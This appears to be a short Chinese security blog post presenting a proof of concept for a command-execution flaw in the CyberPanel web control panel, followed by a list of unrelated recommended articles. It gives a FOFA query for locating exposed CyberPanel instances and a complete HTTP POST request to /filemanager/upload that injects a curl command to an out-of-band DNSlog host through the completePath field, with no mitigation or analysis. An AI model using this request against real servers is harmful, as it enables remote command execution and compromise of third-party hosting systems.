CyberPanel开源Web控制面板 upload 命令执行漏洞复现及POC

CatalyzeSec2024-11-09 17:51

FOFA

app="CyberPanel"

POC

POST /filemanager/upload HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: multipart/form-data; boundary=----NewBoundary123456789
Content-Length: 338

------NewBoundary123456789
Content-Disposition: form-data; name="domainName"

<target>
------NewBoundary123456789
Content-Disposition: form-data; name="completePath"

curl http://DNSlog地址/
------NewBoundary123456789
Content-Disposition: form-data; name="file"; filename="poc.txt"

pwn
------NewBoundary123456789--

漏洞复现

相关推荐
网络安全queen7 小时前
认识网络安全
网络·网络协议·网络安全
番茄酱料8 小时前
idea-java项目中的全部接口提取
java·网络安全·intellij-idea
IT-sec11 小时前
jquery-picture-cut 任意文件上传(CVE-2018-9208)
android·前端·javascript·安全·web安全·网络安全·jquery
网络安全-老纪11 小时前
网工考试——网络安全
网络·安全·web安全
嚯——哈哈12 小时前
高防服务器HOT:网络安全的无形盾牌,护航业务稳定
服务器·安全·web安全
风间琉璃""13 小时前
对传统加密算法降维打击?!——量子计算
网络安全·安全威胁分析·量子计算·加密算法·传统算法
The博宇15 小时前
真实网络安全面试场景题
安全·web安全
摘星怪sec17 小时前
【漏洞复现】|百易云资产管理运营系统/mobilefront/c/2.php前台文件上传
网络安全·文件上传·漏洞复现
群联云防护小杜19 小时前
如何解决DDoS导致服务器宕机?
网络·网络协议·安全·web安全·udp
黑客-秋凌20 小时前
【网络安全】浅谈IP溯源的原理及方法
网络·tcp/ip·web安全
热门推荐
01(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明02玄机平台应急响应—webshell查杀03【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总0404 - matlab m_map地学绘图工具基础函数 - 设置网格05Docker 夺命连环 15 问06PyTorch机器学习实现液态神经网络07鸿蒙LiteOS+Hi3861智能家居网关设计:MQTT协议实现与代码示例08支付宝短视频平台创作分成激励项目09RAG 实践- Ollama+RagFlow 部署本地知识库10centos下静态链接:/usr/bin/ld: cannot find -l某某某